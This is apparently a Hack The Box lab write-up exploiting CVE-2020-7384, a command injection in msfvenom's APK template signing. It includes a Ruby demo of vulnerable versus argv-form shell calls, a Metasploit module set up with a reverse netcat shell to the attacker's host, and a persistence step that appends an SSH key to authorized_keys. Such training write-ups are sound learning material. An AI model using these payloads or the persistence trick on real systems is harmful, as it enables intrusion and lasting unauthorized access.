Command Injection


The target web application hosts a series of security tools online. One of the sections, payloads, uses the msfvenom tool to generate a payload, and it appears to be vulnerable to CVE-2020-7384.

Metasploit Framework’s msfvenom is vulnerable to a command injection vulnerability when the user provides a crafted APK file to use as an Android payload template. A “template” file in this context is an existing APK file, within which an Android payload will be embedded.

The vulnerability affects Metasploit Framework 6.0.11 and earlier and Metasploit Pro 4.18.0 and earlier.

While I haven't confirmed the version of the Metasploit Framework instance on the target, it is highly likely to be vulnerable. For reference, the most recent release is 6.3.5 as of March 2, 2023.
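To make the underlying bug concrete, here is an added example (not code from this writeup or from Metasploit itself) that contrasts the vulnerable pattern, interpolating an attacker-chosen certificate dname into a shell command string, with the argv form that never invokes a shell. In the real CVE the untrusted value is the owner field of the APK's signing certificate, which msfvenom read back with keytool; here `echo` stands in for keytool, the marker file, the constructed malicious dname and the `valid_dname?` allowlist are all my own assumptions for the demonstration.

```ruby
require 'open3'
require 'tmpdir'

# Constructed stand-in for the certificate "Owner:" value that the vulnerable
# msfvenom parsed out of `keytool -printcert -jarfile template.apk`.
# Whoever signed the template chose this string, so it is attacker-controlled.
BENIGN_DNAME = 'CN=Android Debug, O=Android, C=US'.freeze

# Constructed malicious dname: the double quote closes the -dname argument,
# the rest runs as separate shell commands, and the final `echo "` keeps the
# command string syntactically valid. `marker` is a file path the injected
# command creates so the side effect can be observed.
def malicious_dname(marker)
  %(x"; touch "#{marker}"; echo ")
end

# Vulnerable pattern (illustrative, not the upstream code): untrusted input is
# interpolated into one command string. Ruby hands a string containing shell
# metacharacters to /bin/sh -c, so the quoting around dname is defeated by a
# quote inside dname. `echo` stands in for keytool so the example runs anywhere.
def sign_vulnerable(dname)
  cmd = %(echo keytool -genkey -dname "#{dname}")
  out, _status = Open3.capture2e(cmd)
  out
end

# Hardened pattern: argv form. Every element reaches execve() as exactly one
# argument and no shell is involved, so quotes and semicolons are plain bytes.
def sign_hardened(dname)
  out, _status = Open3.capture2e('echo', 'keytool', '-genkey', '-dname', dname)
  out
end

# Optional defence in depth (assumed policy, not the upstream fix): only accept
# characters that legitimately appear in an X.500 distinguished name.
DNAME_ALLOWED = %r{\A[\w .,=:@+/\-]+\z}

def valid_dname?(dname)
  dname.match?(DNAME_ALLOWED)
end

# Feeds the malicious dname to one of the signers in a scratch directory and
# reports whether the injected `touch` actually created the marker file.
def injected?(signer)
  Dir.mktmpdir do |dir|
    marker = File.join(dir, 'pwned')
    send(signer, malicious_dname(marker))
    File.exist?(marker)
  end
end

if $PROGRAM_NAME == __FILE__
  puts "string form, shell involved : injected=#{injected?(:sign_vulnerable)}"
  puts "argv form, no shell         : injected=#{injected?(:sign_hardened)}"
  puts "allowlist accepts benign    : #{valid_dname?(BENIGN_DNAME)}"
  puts "allowlist accepts malicious : #{valid_dname?(malicious_dname('/tmp/x'))}"
end
```

Run it with `ruby cmd_injection_demo.rb`: the string form reports `injected=true` because `/bin/sh` split the command at the injected quote, the argv form reports `injected=false` with the whole dname echoed back as one literal argument. The same distinction applies to `system`, backticks and `IO.popen` in Ruby, and the allowlist is only a second layer; the argv form is what actually removes the shell from the path.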

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ msfconsole

I first need to start msfconsole

msf6 > use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp

I will be using the unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection exploit module.

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 10.10.14.12
LHOST => 10.10.14.12
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 9999
LPORT => 9999

I will then set the payload to cmd/unix/reverse_netcat and point LHOST and LPORT at my listener.

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options
 
Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name
 
 
Payload options (cmd/unix/reverse_netcat):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.12      yes       The listen address (an interface may be specified)
   LPORT  9999             yes       The listen port
 
   **DisablePayloadHandler: True   (no handler will be created!)**
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic
 
 
 
View the full module info with the info, or info -d command.

Overall, it looks like this.

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run
 
[+] msf.apk stored at /home/kali/.msf4/local/msf.apk

Running this generates a crafted APK template, msf.apk. The reverse shell command is embedded in the APK's signing certificate, which is exactly what the vulnerable msfvenom reads back and passes to a shell when the file is used as a template.

┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ mv /home/kali/.msf4/local/msf.apk .

I will move the APK file to the current working directory

Next, upload the generated APK to the payloads page as the template. It's important to set the os parameter to android; the lhost parameter doesn't matter. Before submitting the form, start a listener on the port set in LPORT:

┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.226] 40094
whoami
kid
hostname
scriptkiddie
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.226  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:8437  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:8437  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:84:37  txqueuelen 1000  (Ethernet)
        RX packets 45  bytes 7302 (7.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 36  bytes 7179 (7.1 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 456  bytes 32888 (32.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 456  bytes 32888 (32.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Initial foothold established on the target system as the kid user by exploiting CVE-2020-7384.

SSH


Although the exploit was successful, I find it rather unstable, as the web server appeared unable to handle such operations efficiently. So it might have worked flawlessly the first time, but that was not the case when I tried again the second and third time.

kid@scriptkiddie:~/.ssh$ ll
total 8.0K
4.0K drwx------  2 kid kid 4.0K Feb 10  2021 .
   0 -rw-rw-r--  1 kid kid    0 Feb 10  2021 authorized_keys
4.0K drwxr-xr-x 11 kid kid 4.0K Feb  3  2021 ..

Since the kid user already has an (empty) authorized_keys file in ~/.ssh, I will append my own public key to it so that I can connect to the target over SSH.

kid@scriptkiddie:~/.ssh$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' >> /home/kid/.ssh/authorized_keys

Done

┌──(kali㉿kali)-[~/archive/htb/labs/scriptkiddie]
└─$ ssh kid@$IP -i ~/.ssh/id_ed25519
The authenticity of host '10.10.10.226 (10.10.10.226)' can't be established.
ED25519 key fingerprint is SHA256:PJE5qFlR+iWt9MI6zk2i3lz3W/pLGZQ1+iq0XiCzpJQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.226' (ED25519) to the list of known hosts.
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-65-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Fri Mar 31 08:25:31 UTC 2023
 
  System load:             0.08
  Usage of /:              29.3% of 17.59GB
  Memory usage:            7%
  Swap usage:              0%
  Processes:               223
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.226
  IPv6 address for ens160: dead:beef::250:56ff:feb9:8437
 
 
1 update can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
 
 
Last login: Wed Feb  3 12:07:35 2021 from 10.10.14.4
kid@scriptkiddie:~$ whoami
kid
kid@scriptkiddie:~$ hostname
scriptkiddie
kid@scriptkiddie:~$ ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.226  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:8437  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:8437  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:84:37  txqueuelen 1000  (Ethernet)
        RX packets 377  bytes 38285 (38.2 KB)
        RX errors 0  dropped 24  overruns 0  frame 0
        TX packets 169  bytes 37789 (37.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1432  bytes 102256 (102.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1432  bytes 102256 (102.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Nice. Now I can always get back in if I ever lose the connection.